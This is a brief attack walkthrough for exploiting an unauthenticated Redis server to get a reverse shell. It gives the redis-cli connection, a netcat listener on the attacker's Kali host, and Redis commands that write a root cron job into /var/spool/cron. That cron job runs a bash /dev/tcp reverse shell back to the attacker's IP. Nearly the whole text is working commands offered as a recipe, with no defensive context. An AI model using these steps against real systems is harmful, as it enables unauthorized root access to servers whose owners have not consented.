Redis unauthorized access to bounce shell
Target host: 10.104.11.178
Attacker: Kali
Attack steps:
1. Connect with the target host
root@kali:~# /usr/redis/redis-cli -h 10.104.11.178
2. Kali host to monitor
nc -l -v -p 9999
3. Write a rebound shell statement
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n" config set dir /var/spool/cron config set dbfilename root save
4. The rebound shell connection is successful